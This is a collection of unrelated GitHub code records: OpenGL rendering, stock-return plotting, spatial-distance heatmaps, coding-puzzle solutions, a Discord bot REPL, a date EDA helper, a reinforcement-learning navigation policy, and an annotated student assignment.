vertices\n self.indices = indices\n self.va.update(VertexBuffer(self.vertices), IndexBuffer(self.indices))\n\n def render_start(self, shader, camera, colour):\n self.colour = colour\n self.va.bind()\n shader.bind()\n shader.uniformmat4(\"cameraMatrix\", camera.view_projection_matrix)\n shader.uniform3f(\"lineColour\", self.colour)\n\n def render(self, shader, translation):\n shader.uniform3f(\"translation\", [translation[0], translation[1], 0.0])\n glDrawElements(GL_LINES, self.va.indexBuffer.getCount(), GL_UNSIGNED_SHORT, None)\n\n def render_end(self, shader):\n shader.unbind()\n self.va.unbind()","repo_name":"bionanopatterning/scNodes","sub_path":"scNodes/core/roi.py","file_name":"roi.py","file_ext":"py","file_size_in_byte":3899,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"71"} +{"seq_id":"33990761102","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nfrom pandas_datareader import data as wb\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nacao1=input('CODE: ')\nacao2=input('CODE: ')\nL=[acao1,acao2]\n\na = wb.DataReader(acao1, data_source = 'yahoo', start = '2017-8-1')\nb = wb.DataReader(acao2, data_source = 'yahoo', start = '2017-8-1')\nc = pd.DataFrame()\nfor t in L:\n c[t] = wb.DataReader(t, data_source = 'yahoo', start = '2017-8-1')['Adj Close']\n\n\na['Retorno Simples']=((a['Adj Close']/a['Adj Close'].shift(1))-1)*100\nb['Retorno Simples 2']=((b['Adj Close']/b['Adj Close'].shift(1))-1)*100\n\n\n# In[2]:\n\n\na['Retorno Simples'].plot(color='black',title = 'Variação Diária: %s'%(acao1))\nplt.show()\nb['Retorno Simples 2'].plot(color='red',title = 'Variação Diária: %s'%(acao2))\nplt.show()\n\navg_returns_d_1=a['Retorno 
Simples'].mean()\nprint('Média de Variação Diária %s: %.3f%s'%(acao1,avg_returns_d_1, '%'))\navg_returns_d_2=b['Retorno Simples 2'].mean()\nprint('Média de Variação Diária %s: %.3f%s'%(acao2,avg_returns_d_2, '%'))\n\navg_returns_d_1=a['Retorno Simples'].mean()*250\nprint('\\nMédia de Variação Anual %s: %.3f%s'%(acao1,avg_returns_d_1,'%'))\navg_returns_d_2=b['Retorno Simples 2'].mean()*250\nprint('Média de Variação Anual %s: %.3f%s'%(acao2,avg_returns_d_2,'%'))\n\n\n# In[3]:\n\n\na['Adj Close'].plot(color='black',title=('%s')%(acao1))\nplt.show()\nb['Adj Close'].plot(color='red',title=('%s')%(acao2))\nplt.show()\n(c/c.iloc[0]*100).plot(color=('black','red'), title = 'Comparativo ')\nplt.show()\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"AndreDaher99/Financial-Analysis-HacktoberFest","sub_path":"Comparativo 2 Ações.py","file_name":"Comparativo 2 Ações.py","file_ext":"py","file_size_in_byte":1556,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"29815015107","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# Created on Sat Oct 24 13:07:38 2020\n# @author: Ajit Johnson Nirmal\n\"\"\"\n!!! abstract \"Short Description\"\n `sm.pl.spatial_distance`: The function allows users to visualize the average shortest distance between phenotypes of interest.\n Run `sm.tl.spatial_distance` before running this function.\n\n## Function\n\"\"\"\n\n# library\nimport pandas as pd\nimport matplotlib\nimport numpy as np\nimport seaborn as sns; sns.set(color_codes=True)\nsns.set_style(\"white\")\n\n\ndef spatial_distance (adata, spatial_distance='spatial_distance',phenotype='phenotype',imageid='imageid',log=False,\n method='heatmap',heatmap_summarize=True,heatmap_na_color='grey',heatmap_cmap='vlag_r',\n heatmap_row_cluster=False,heatmap_col_cluster=False,heatmap_standard_scale=0,\n distance_from=None,distance_to=None,x_axis = None,y_axis = None,facet_by = None,plot_type = None,\n return_data = False, subset_col=None, subset_value=None,\n **kwargs):\n \"\"\"\nParameters:\n\n adata : AnnData object\n\n spatial_distance : string, optional\n In order to locate the spatial_distance data within the AnnData object please provide the output\n label/columnname of `sm.tl.spatial_distance` function.\n\n phenotype : string, required\n Column name of the column containing the phenotype information.\n It could also be any categorical assignment given to single cells.\n\n imageid : string, optional\n Column name of the column containing the image id.\n\n log : bool, optional\n Convert distance to log scale.\n\n method : string, optional\n Three options are available.\n 1) heatmap - generates a heatmap of average shortest distance between all phenotypes.\n 2) numeric - can be used to generate boxplot, violin plot etc between a given set of phenotypes.\n 3) distribution - can be used to generate distribution plots between a given set of phenotypes.\n\n heatmap_summarize : bool, optional\n In the event multiple images are present in the dataset, True allows to calculate the\n average across all the images.\n\n heatmap_na_color : string, optional\n Color for NA values within the heatmap.\n\n heatmap_cmap : string, optional\n Color map to use for continous variables.\n Can be a name or a Colormap instance (e.g. 'magma', 'viridis').\n\n heatmap_row_cluster : bool, optional\n Cluster Rows.\n\n heatmap_col_cluster : bool, optional\n Cluster Columns.\n\n heatmap_standard_scale : int, optional\n Either 0 (rows) or 1 (columns). 
Whether or not to standardize that dimension,\n meaning for each row or column, subtract the minimum and divide each by its maximum.\n\n distance_from : string, optional\n In the event of using method = 'numeric' or 'distribution', this argument is required.\n Pass a phenotype of interest. If distance_from is provided and distance_to is not provided,\n the function will plot the average distance from the phenotype of interest to all\n phenotypes present within the dataset.\n\n distance_to : string, optional\n In the event of using method = 'numeric' or 'distribution', this argument is required.\n Pass a phenotype of interest. The function will plot the average shortest distance between two phenotypes of\n interest (distance_from and distance_to).\n\n x_axis : string, optional\n In the event of using method = 'numeric' or 'distribution', this argument is required.\n This determines the elements present in the x-axis of the resultant plot.\n Allowed arguments are: 'group', 'distance', 'imageid'.\n\n y_axis : string, optional\n In the event of using method = 'numeric' or 'distribution', this argument is required.\n This determines the elements present in the y-axis of the numeric plot and if the user uses the distribution\n plot this argument is used to overlay multiple categories within the same distribution plot.\n Allowed arguments are: 'group', 'distance', 'imageid'.\n\n facet_by : string, optional\n In the event of using method = 'numeric' or 'distribution', this argument can be used to\n generate sub-plots. Allowed arguments are: 'group', 'imageid'.\n\n plot_type : string, optional\n In the event of using method = 'numeric' or 'distribution', this argument is required.\n For `numeric` plot, the following options are available: “strip”, “swarm”, “box”, “violin”, “boxen”, “point”, “bar”, or “count”.\n For `distribution` plot, the following options are available: “hist”, “kde”, “ecdf”.\n The default for `numeric` plot is 'boxen'.\n The default for `distribution` plot is 'kde'.\n\n subset_col : string, optional\n If the user wants to consider only a subset of observations while plotting, this argument in conjunction with\n `subset_value` can be used.\n For example, in the event of a multi-image dataset, the `sm.tl.spatial_distance` function was run on all images\n but the user is interested in plotting only a subset of images. Pass the name of the column which contains\n the categories to be subsetted.\n\n subset_value : list, optional\n If the user wants to consider only a subset of observations while plotting, this argument in conjunction with\n `subset_col` can be used. Pass a list of the categories to be subsetted.\n\n **kwargs : dict\n Are passed to sns.clustermap. Pass other parameters that work with `sns.clustermap`, `sns.catplot` or `sns.displot`\n e.g. 
`linecolor='black'`.\n\nReturns:\n Heatmap or Numeric Plot or Distribution Plot.\n\nExample:\n```python\n # summary heatmap\n sm.pl.spatial_distance (adata)\n\n # Heatmap without summarizing the individual images\n sm.pl.spatial_distance (adata, heatmap_summarize=False,\n imageid='ImageId')\n\n # Numeric plot of shortest distance of phenotypes\n # from tumor cells\n sm.pl.spatial_distance (adata, method='numeric',\n distance_from='Tumor CD30+',imageid='ImageId')\n\n # Distribution plot of shortest distance of phenotypes\n # from tumor cells\n sm.pl.spatial_distance (adata, method='distribution',\n distance_from='Tumor CD30+',imageid='ImageId',\n x_axis=\"distance\", y_axis=\"imageid\", plot_type=\"kde\")\n\n # Numeric plot of shortest distance of phenotypes from\n # tumor cells to M2 Macrophages\n sm.pl.spatial_distance (adata, method='numeric',\n distance_from='Tumor CD30+',distance_to = 'M2 Macrophages',\n imageid='ImageId')\n\n # Distribution plot of shortest distance of phenotypes from\n # tumor cells to M2 Macrophages\n sm.pl.spatial_distance (adata, method='distribution',\n distance_from='Tumor CD30+',distance_to = 'M2 Macrophages',\n imageid='ImageId')\n```\n \"\"\"\n\n\n # set color for heatmap\n cmap_updated = matplotlib.cm.get_cmap(heatmap_cmap)\n cmap_updated.set_bad(color=heatmap_na_color)\n\n\n # Copy the spatial_distance results from anndata object\n try:\n distance_map = adata.uns[spatial_distance].copy()\n except KeyError:\n raise ValueError('spatial_distance not found - please run sm.tl.spatial_distance first')\n\n # subset the data if user requests\n if subset_col is not None:\n if isinstance(subset_value, str):\n subset_value = [subset_value]\n # find the cell names to be subsetted out\n obs = adata.obs[[subset_col]]\n cells_to_subset = obs[obs[subset_col].isin(subset_value)].index\n\n # subset the distance_map\n distance_map = distance_map.loc[distance_map.index.intersection(cells_to_subset)]\n #distance_map = distance_map.loc[cells_to_subset]\n\n\n # Convert distance to log scale if user requests\n if log is True:\n distance_map = np.log1p(distance_map)\n\n # Method\n if method=='heatmap':\n if heatmap_summarize is True:\n # create the necessary data\n data = pd.DataFrame({'phenotype': adata.obs[phenotype]})\n data = pd.merge(data, distance_map, how='outer',left_index=True, right_index=True) # merge with the distance map\n k = data.groupby(['phenotype']).mean() # collapse the whole dataset into mean expression\n d = k[k.index]\n else:\n # create new naming scheme for the phenotypes\n non_summary = pd.DataFrame({'imageid': adata.obs[imageid], 'phenotype': adata.obs[phenotype]})\n non_summary['imageid'] = non_summary['imageid'].astype(str) # convert the column to string\n non_summary['phenotype'] = non_summary['phenotype'].astype(str) # convert the column to string\n non_summary['image_phenotype'] = non_summary['imageid'].str.cat(non_summary['phenotype'],sep=\"_\")\n # Merge distance map with phenotype\n data = pd.DataFrame(non_summary[['image_phenotype']])\n data = pd.merge(data, distance_map, how='outer',left_index=True, right_index=True)\n k = data.groupby(['image_phenotype']).mean()\n d = k.sort_index(axis=1)\n # Generate the heatmap\n mask = d.isnull() # identify the NaNs for masking \n d = d.fillna(0) # replace NaNs with 0 so that clustering will work\n # Heatmap\n sns.clustermap(d, cmap=heatmap_cmap, row_cluster=heatmap_row_cluster,\n col_cluster=heatmap_col_cluster, mask=mask,\n standard_scale=heatmap_standard_scale, **kwargs)\n else:\n\n # condition-1\n if 
distance_from is None and distance_to is None:\n raise ValueError('Please include distance_from and/or distance_to parameters to use this method')\n\n # condition-2\n if distance_from is None and distance_to is not None:\n raise ValueError('Please include the `distance_from` parameter to use this method')\n\n # condition-3\n if distance_to is not None:\n # convert input to list if needed\n if isinstance(distance_to, str):\n distance_to = [distance_to]\n\n # Start\n pheno_df = pd.DataFrame({'imageid': adata.obs[imageid], 'phenotype': adata.obs[phenotype]}) #image id and phenotype\n data = pd.merge(pheno_df, distance_map, how='outer',left_index=True, right_index=True) # merge with the distance map\n data = data[data['phenotype'] == distance_from] # subset the pheno of interest\n\n if distance_to is not None:\n data = data[distance_to] # drop columns that are not requested in distance_to\n else:\n data = data.drop(['phenotype','imageid'], axis=1) # drop the phenotype column before stacking\n\n d = data.stack().reset_index() # collapse everything to one column\n d.columns = ['cellid', 'group', 'distance']\n d = pd.merge(d, pheno_df, left_on='cellid', right_index=True) # bring back the imageid and phenotype\n\n # Convert columns to str\n for col in ['imageid', 'group','phenotype']:\n d[col] = d[col].astype(str)\n\n # Convert columns to categorical so that it drops unused categories\n for col in ['imageid', 'group','phenotype']:\n d[col] = d[col].astype('category')\n\n # rearrange the order based on from and to list provided\n if distance_to is not None:\n d['group'] = d['group'].cat.reorder_categories(distance_to)\n d = d.sort_values('group')\n\n # Plotting\n if method=='numeric':\n if x_axis is None and y_axis is None and facet_by is None and plot_type is None:\n sns.catplot(data=d, x=\"distance\", y=\"group\", col=\"imageid\", kind=\"boxen\", **kwargs)\n else:\n sns.catplot(data=d, x=x_axis, y=y_axis, col=facet_by, kind=plot_type, **kwargs)\n\n if method=='distribution':\n if x_axis is None and y_axis is None and facet_by is None and plot_type is None:\n sns.displot(data=d, x=\"distance\", hue=\"imageid\", col=\"group\", kind=\"kde\", **kwargs)\n else:\n sns.displot(data=d, x=x_axis, hue=y_axis, col=facet_by, kind=plot_type,**kwargs)\n\n # return\n if return_data is True:\n return d\n","repo_name":"labsyspharm/scimap","sub_path":"scimap/plotting/_spatial_distance.py","file_name":"_spatial_distance.py","file_ext":"py","file_size_in_byte":12247,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"71"} +{"seq_id":"8473418512","text":"def one_edit_away(first,second):\n if abs(len(first)-len(second)) > 1:\n return False\n\n if (len(first) < len(second)):\n s1 = first\n s2 = second\n else:\n s1 = second\n s2 = first\n\n index1 = 0\n index2 = 0\n\n found_diff = False\n while(index2 < len(s2) and index1 < len(s1)):\n if (s1[index1] != s2[index2]):\n if (found_diff):\n return False\n found_diff = True\n if (len(s1) == len(s2)):\n index1 += 1\n else:\n index1 += 1\n index2+=1\n\n return True\n \n \n","repo_name":"tanvirraihan142/CtCi-in-python","sub_path":"Chap 1/1.5.2 One Away.py","file_name":"1.5.2 One Away.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"15525597831","text":"class Solution:\n def countSubIslands(self, grid1: List[List[int]], grid2: List[List[int]]) -> int:\n rows = len(grid1)\n cols = len(grid1[0])\n vis = set()\n def dfs(r,c):\n if r<0 or c<0 or 
r==rows or c==cols or (r,c) in vis or grid2[r][c]==0:\n return True\n vis.add((r,c)) \n res = True\n if grid1[r][c]==0:\n res = False\n res = dfs(r-1,c) and res \n res = dfs(r+1,c) and res \n res = dfs(r,c-1) and res \n res = dfs(r,c+1) and res \n return res \n\n count = 0\n for r in range(rows):\n for c in range(cols):\n if grid2[r][c] and (r,c) not in vis and dfs(r,c):\n count +=1\n return count \n ","repo_name":"suman0907/leetcode","sub_path":"count-sub-islands/count-sub-islands.py","file_name":"count-sub-islands.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"13068965997","text":"import asyncio\nfrom .internal import code_async as code\nfrom .internal import commands\n\nclass main:\n def __init__(self, client):\n self.client = client\n self.sessions = {}\n self.coreGlobals = {}\n self.coreLocals = {}\n\n @commands.ownerCommand(optional=True)\n async def repl(self, m, args):\n \"\"\"Start a repl session.\nUSAGE:\n repl [prefix]\n\nARGUMENTS:\n prefix: The prefix to start python commands with. Defaults to `.\"\"\"\n if self.sessions.get(m.channel.id, None) is None:\n if args is None:\n args = \"`\"\n sh = Shell(self.client, m, args, glob=self.coreGlobals, loc=self.coreLocals)\n self.sessions[m.channel.id] = sh, args\n await sh.interact(banner=\"REPL session started.\\nThe prefix is \" + args, exitmsg=\"Exiting REPL session...\")\n del self.sessions[m.channel.id]\n else:\n await self.client.send_message(m.channel, \"Err: There is already a REPL session running in this channel. Use \" + self.sessions[m.channel.id][1] + \"quit() to quit it.\")\n\n @commands.ownerCommand(\"quitrepl\")\n async def replquit(self, m, _):\n \"\"\"Quit a repl session.\nUSAGE:\n replquit\"\"\"\n if self.sessions.get(m.channel.id, None) is None:\n await self.client.send_message(m.channel, \"Err: There is no REPL session running in this channel.\")\n else:\n del self.sessions[m.channel.id]\n await self.client.send_message(m.channel, \"REPL session quit.\")\n\nclass Shell(code.InteractiveConsole):\n def __init__(self, client, message, prefix=\"`\", glob={}, loc={}):\n self.client = client\n self.m = message\n self.prefix = prefix\n code.InteractiveConsole.__init__(self)\n self.locals.update(glob)\n self.locals.update(loc)\n\n async def write(self, data):\n await self.client.send_message(self.m.channel, \"```python\\n\" + str(data) + \"```\")\n\n async def raw_input(self, p=\">>>\"):\n prompt = await self.client.send_message(self.m.channel, \"`\" + p + \"`\")\n def check(m):\n return m.content.startswith(self.prefix) and (not m.content.startswith(\"```\")) and (not m.content == \"`\" + p + \"`\")\n inp = await self.client.wait_for_message(author=self.m.author, channel=self.m.channel, check=check)\n res = str(inp.content)\n if res.lstrip(self.prefix).lower() in [\"quit()\", \"quit\", \"exit()\", \"exit\"]:\n raise EOFError\n if inp.author.id == self.client.user.id:\n await self.client.edit_message(inp, prompt.content + \" \" + res.strip(self.prefix))\n await self.client.delete_message(prompt)\n return res.strip(\"`\\n\")\n","repo_name":"BluCodeGH/BluBot","sub_path":"modules/repl.py","file_name":"repl.py","file_ext":"py","file_size_in_byte":2487,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"} +{"seq_id":"34085379350","text":"\n\nclass MySolution(object):\n \"\"\"\n The straightforward approach: use binary search; its drawback is that after a matching middle element is found we still scan outward to the left and right, which makes the time complexity less than ideal.\n Runtime: 24 ms, faster than 82.77% of Python 
online submissions for Find First and Last Position of Element in Sorted Array.\n Memory Usage: 11.4 MB, less than 60.93% of Python online submissions for Find First and Last Position of Element in Sorted Array.\n \"\"\"\n def searchRange(self, nums, target):\n \"\"\"\n :type nums: List[int]\n :type target: int\n :rtype: List[int]\n \"\"\"\n if nums == []:\n return [-1, -1]\n left_pos = 0\n right_pos = len(nums)\n \n while left_pos < right_pos:\n middle_pos = (right_pos - left_pos) // 2 + left_pos\n middle_val = nums[middle_pos]\n \n if middle_val == target:\n left = middle_pos\n while left >= 0 and nums[left] == target:\n left -= 1\n right = middle_pos\n while right < len(nums) and nums[right] == target:\n right += 1\n return [left + 1, right - 1]\n elif middle_val < target:\n left_pos = middle_pos + 1\n else: # middle_val > target:\n right_pos = middle_pos\n return [-1, -1]\n\n\nclass Solution(object):\n \"\"\"\n Use Python's built-in index(): two index() lookups locate the target positions, and the error raised when the target is absent is caught.\n Runtime: 20 ms, faster than 100.00% of Python online submissions for Find First and Last Position of Element in Sorted Array.\n Memory Usage: 11.9 MB, less than 5.30% of Python online submissions for Find First and Last Position of Element in Sorted Array.\n \"\"\"\n def searchRange(self, nums, target):\n \"\"\"\n :type nums: List[int]\n :type target: int\n :rtype: List[int]\n \"\"\"\n try:\n return [nums.index(target),len(nums)-list(reversed(nums)).index(target)-1]\n except:\n return [-1,-1]\n\n\n \n","repo_name":"sandwu/leetcode_problems","sub_path":"1.Array/medium/34. Find First and Last Position of Element in Sorted Array.py","file_name":"34. Find First and Last Position of Element in Sorted Array.py","file_ext":"py","file_size_in_byte":2123,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"} +{"seq_id":"25702962657","text":"import pandas as pd\nfrom datetime import datetime\n\ndef get_date_columns(dataframe):\n date_columns = []\n\n # Iterate through the DataFrame columns and check if they are datetime objects\n for column in dataframe.columns:\n if pd.api.types.is_datetime64_any_dtype(dataframe[column]):\n date_columns.append(column)\n\n return date_columns\n\ndef date_column_info(col):\n current_date = datetime.now()\n col_info = {}\n\n col_info[\"Number of Unique Values\"] = len(col.unique())\n col_info[\"Number of Rows with Missing Values\"] = col.isnull().sum()\n col_info[\"Number of Weekend Dates\"] = sum(col.dt.weekday.isin([5,6]))\n col_info[\"Number of Weekday Dates\"] = sum(col.dt.weekday.isin([0,1,2,3,4]))\n col_info[\"Number of Dates in Future\"] = sum(col > current_date)\n col_info[\"Number of Rows with 1900-01-01\"] = sum(col == '1900-01-01')\n col_info[\"Number of Rows with 1970-01-01\"] = sum(col == '1970-01-01')\n col_info[\"Minimum Value\"] = col.min()\n col_info[\"Maximum Value\"] = col.max()\n\n return col_info\n\ndef date_value_frequency(dataframe, column):\n # find top 20 most frequent values\n value_counts = dataframe[column].value_counts()\n df_freq = pd.DataFrame({'value': value_counts.index, 'occurrence': value_counts.values})[:20]\n df_freq['percentage'] = (df_freq['occurrence'] / len(dataframe))*100\n\n return df_freq","repo_name":"prateeknc/eda-app","sub_path":"tab_date/logics.py","file_name":"logics.py","file_ext":"py","file_size_in_byte":1373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"69966984870","text":"import numpy as np\nimport torch\nimport torch.nn as nn\nimport 
torch.nn.functional as F\nimport torchvision\n\nimport nav_analysis.rl.resnet\nfrom nav_analysis.rl.layer_norm_lstm import LayerNormLSTM\nfrom nav_analysis.rl.ppo.policy import Net as PPONet, Policy\nfrom nav_analysis.rl.ppo.utils import CategoricalNet, Flatten\nfrom nav_analysis.rl.running_mean_and_var import RunningMeanAndVar\n\n\nclass HRLPolicy(nn.Module):\n def __init__(\n self,\n pointnav_agent: Policy,\n hidden_size=512,\n num_recurrent_layers=2,\n rnn_type=\"LSTM\",\n ):\n super().__init__()\n self.pointnav_agent = pointnav_agent\n\n self.net = Net(\n hidden_size=hidden_size,\n num_recurrent_layers=num_recurrent_layers,\n rnn_type=rnn_type,\n )\n\n def forward(self, *x):\n return None\n\n def _pack_hidden(self, net_hidden_states, pointnav_hidden_states):\n # net_hidden_states = net_hidden_states.view(2, -1, 512)\n return torch.cat([net_hidden_states, pointnav_hidden_states], 0)\n\n def _unpack_hidden(self, hidden_states):\n net_hidden_states = hidden_states[0:4]\n # net_hidden_states = net_hidden_states.view(4, -1, 256)\n pointnav_hidden_states = hidden_states[4:]\n\n return (net_hidden_states, pointnav_hidden_states)\n\n def act(\n self, observations, rnn_hidden_states, prev_actions, masks, deterministic=False\n ):\n net_hidden_states, pointnav_hidden_states = self._unpack_hidden(\n rnn_hidden_states\n )\n\n value, goal_preds, net_hidden_states, pg_masks, pg_model_steps = self.net(\n observations, net_hidden_states, prev_actions, masks\n )\n observations[\"pointgoal\"] = goal_preds\n\n (\n _,\n action,\n action_log_probs,\n entropy,\n pointnav_hidden_states,\n ) = self.pointnav_agent.act(\n observations, pointnav_hidden_states, prev_actions, pg_masks, deterministic\n )\n\n return (\n value,\n action,\n action_log_probs,\n entropy,\n self._pack_hidden(net_hidden_states, pointnav_hidden_states),\n goal_preds,\n pg_masks,\n pg_model_steps,\n )\n\n def get_value(self, observations, rnn_hidden_states, prev_actions, masks):\n net_hidden_states, pointnav_hidden_states = self._unpack_hidden(\n rnn_hidden_states\n )\n\n return self.net(observations, net_hidden_states, prev_actions, masks)[0]\n\n def evaluate_actions(\n self, observations, rnn_hidden_states, prev_actions, masks, action\n ):\n net_hidden_states, pointnav_hidden_states = self._unpack_hidden(\n rnn_hidden_states\n )\n\n value, goal_preds, net_hidden_states, pg_masks, _ = self.net(\n observations, net_hidden_states, prev_actions, masks\n )\n observations[\"pointgoal\"] = goal_preds\n\n (\n _,\n action_log_probs,\n distribution_entropy,\n rnn_hidden_states,\n _,\n ) = self.pointnav_agent.evaluate_actions(\n observations, pointnav_hidden_states, prev_actions, pg_masks, action\n )\n return (value, action_log_probs, distribution_entropy, rnn_hidden_states, None)\n\n\n@torch.jit.script\ndef update_ego_motion(\n prev_pg, ego, goal_preds, masks, pg_model_steps, pg_masks, updated_goal_preds\n):\n r = torch.norm(goal_preds, p=2, dim=-1, keepdim=True)\n xy = goal_preds / r\n goal_preds = torch.cat([r, xy], dim=-1)\n\n T = ego.size(0)\n for t in range(T):\n r = prev_pg[:, 0:1]\n xy = r * prev_pg[:, 1:]\n xy = torch.stack([xy[:, 1], -xy[:, 0]], -1)\n xy = torch.baddbmm(\n ego[t, :, :, 2:], ego[t, :, :, 0:2], xy.unsqueeze(-1)\n ).squeeze(-1)\n xy = torch.stack([-xy[:, 1], xy[:, 0]], -1)\n\n r = torch.norm(xy, p=2, dim=-1, keepdim=True)\n xy = xy / r\n\n new_pg = torch.cat([r, xy], -1)\n pg_masks[t] = (\n (new_pg[:, 0] < 0.25).float()\n * masks[t]\n * (pg_model_steps[t] == 0.0).float()\n )\n\n updated_goal_preds[t] = torch.where(\n 
pg_masks[t].byte().unsqueeze(-1), new_pg, goal_preds[t]\n )\n prev_pg = updated_goal_preds[t].clone()\n\n return pg_masks, updated_goal_preds\n\n\nclass Net(PPONet):\n \"\"\"Network which passes the input image through CNN and concatenates\n goal vector with CNN's output and passes that through RNN.\n \"\"\"\n\n def __init__(self, hidden_size, num_recurrent_layers, rnn_type):\n nn.Module.__init__(self)\n\n self.pointnav_agent_action_embedding = nn.Embedding(5, 32)\n self._n_prev_action = 32\n\n self._hidden_size = hidden_size\n self.hidden_size = hidden_size\n\n self.feature_compress = nn.Sequential(\n Flatten(), nn.Linear(2048, hidden_size), nn.ReLU(True)\n )\n self.goal_predictor = nn.Linear(self.hidden_size, 2)\n self.critic_linear = nn.Linear(self.hidden_size, 1)\n\n self._rnn_type = rnn_type\n self._num_recurrent_layers = num_recurrent_layers\n if rnn_type == \"LN-LSTM\":\n self.rnn = LayerNormLSTM(\n hidden_size + self._n_prev_action,\n hidden_size,\n num_layers=num_recurrent_layers,\n )\n else:\n self.rnn = getattr(nn, rnn_type)(\n hidden_size + self._n_prev_action,\n hidden_size,\n num_layers=num_recurrent_layers,\n )\n\n self.layer_init()\n self.train()\n\n def layer_init(self):\n\n for name, param in self.rnn.named_parameters():\n if \"weight\" in name:\n nn.init.orthogonal_(param)\n elif \"bias\" in name:\n nn.init.constant_(param, 0)\n\n for layer in self.modules():\n if isinstance(layer, nn.Linear):\n nn.init.orthogonal_(layer.weight, gain=0.01)\n nn.init.constant_(layer.bias, 0)\n\n nn.init.constant_(self.goal_predictor.bias, 1.0 / np.sqrt(2))\n\n def _update_pg(self, observations, goal_preds, masks, N):\n prev_pg = observations[\"prev_pointgoal\"]\n T = prev_pg.size(0) // N\n prev_pg = prev_pg.view(T, N, -1)\n ego = observations[\"ego_motion\"]\n ego = ego.view(T, N, *ego.size()[1:])\n pg_model_steps = torch.fmod(observations[\"pg_model_steps\"].view(T, N) + 1, 10)\n\n masks = masks.view(T, N)\n goal_preds = goal_preds.view(T, N, -1)\n pg_masks = torch.zeros(T, N, device=masks.device)\n updated_goal_preds = prev_pg.clone()\n prev_pg = prev_pg[0]\n pg_masks, updated_goal_preds = update_ego_motion(\n prev_pg,\n ego,\n goal_preds,\n masks,\n pg_model_steps,\n pg_masks,\n updated_goal_preds,\n )\n\n updated_goal_preds = updated_goal_preds.view(T * N, -1)\n pg_masks = pg_masks.view(T * N, 1)\n pg_model_steps = pg_model_steps.view(T * N, 1)\n\n return updated_goal_preds, pg_masks, pg_model_steps\n\n def forward(self, observations, rnn_hidden_states, prev_actions, masks):\n prev_actions = self.pointnav_agent_action_embedding(\n ((prev_actions.float() + 1) * masks).long().squeeze(-1)\n )\n\n features = observations[\"features\"]\n features = self.feature_compress(features)\n x = torch.cat([features, prev_actions], dim=1)\n x, rnn_hidden_states = self.forward_rnn(x, rnn_hidden_states, masks)\n\n goal_preds = self.goal_predictor(x)\n\n goal_preds, pg_masks, pg_model_steps = self._update_pg(\n observations, goal_preds, masks, rnn_hidden_states.size(1)\n )\n\n return (\n self.critic_linear(x),\n goal_preds,\n rnn_hidden_states,\n pg_masks,\n pg_model_steps,\n )\n","repo_name":"erikwijmans/emergence-of-maps","sub_path":"nav_analysis/rl/ppo/hrl_policy.py","file_name":"hrl_policy.py","file_ext":"py","file_size_in_byte":7985,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"71"} +{"seq_id":"27040379641","text":"# Template for code submission\n# Name :Alyssa Chonko\n# Email :alc258@pitt.edu\n# Date :10/28/26\n# Class :CS0008-f2016\n# instructor : 
Max Novelli (man8@pitt.edu)\n#\n# Description:\n# Assignment number 2\n#\n# Notes:\n#had to use a few variable/functions that were not learned in the chapter because i had to google\n#some things to figure out how to make the program work\n#also was not able to test because I couldn't get the test files to work properly.\n#for some reason my program was not recognizing them\n#\n# MN: please do not use inline comments\n#\n# ...and now let's program with Python\n\ndef main(): # Creates the main function\n x=1 #set a variable\n while x != 0: #create loop for entering file\n file = input(\"Enter the name of the file: \") #ask user for file name\n if file== \"quit\": #conditions for when user is finished\n x=0 #and wants to exit program\n if file==\"q\":\n x=0\n if file==\" \":\n x=0\n else: #if user does not want to exit, continue asking for file\n fh=open(file, 'r') #opens the file to read\n total_distance,line_count=file(fh) #assigns value to function\n processFile() #goes to functions\n printKV()\n summary()\n\ndef processFile(fh): # creates process file function which reads file and loops\n # through all lines of file handled\n lines = fh.readlines() # read all lines and store them in variable files\n\n line_count = 0 # count how many lines there are in the file\n\n total_distance = 0 # count total distance\n\n for l in lines: # loop through each line in the file\n l = l.rstrip('\\n') # remove new line character\n\n data = l.split(',') # split name and distance\n\n if len(data) == 2: # only process lines where a name and\n # distance are found\n\n distance = float(data[1]) # set distance variable from value in file\n\n if isinstance(distance, float): # make sure distance is a float\n total_distance += distance\n\n\n line_count += 1 # increment line count\n fh.close() #close file\n\n return (line_count, total_distance) # return the two values, line count and total distance\n\n\ndef printKV(key, value, klen = 0): # printKV: prints and formats key values\n if value == None: # print simple strings without value\n print(key)\n\n if isinstance(value, str): # check for different data types\n print('{:<{}}: {:>20}'.format(key, len(key) + klen, value)) #and format to be the correct length\n elif isinstance(value, float): #and decimal placement\n print('{:<{}}: {:>10.3f}'.format(key, len(key) + klen, value)) #(len is used for the length)\n elif isinstance(value, int):\n print('{:<{}}: {:>10}'.format(key, len(key) + klen, value))\n\ndef summary(totalLineCount, total_distance): #function for printing\n printKV('Totals', None)\n printKV('Total # of lines', totalLineCount)\n printKV('Total distance run', total_distance)\n\n\ndef main(): # Creates the main function\n x=1\n while x != 0:\n file = input(\"Enter the name of the file: \")\n if file== \"quit\":\n x=0\n if file==\"q\":\n x=0\n if file==\" \":\n x=0\n else:\n fh=open(file, 'r')\n # MN: this following statement assumes that you have defined a function named \"file\"\n #total_distance,line_count=file(fh)\n # MN: if you call processFile this way, you are not passing in the file handle/object\n # and you do not collect the output from it\n #processFile()\n # MN: here how you should have called processFile\n line_count, total_distance = processFile(fh)\n # MN: if you call printKV without arguments, it cannot print anything\n #printKV()\n # MN: here how you should have been calling printKV\n printKV('File number of lines',line_count)\n printKV('File distance run',total_distance)\n # MN: if you call summary here you will run it after processing every file\n #summary()\n\n\nmain() # call the 
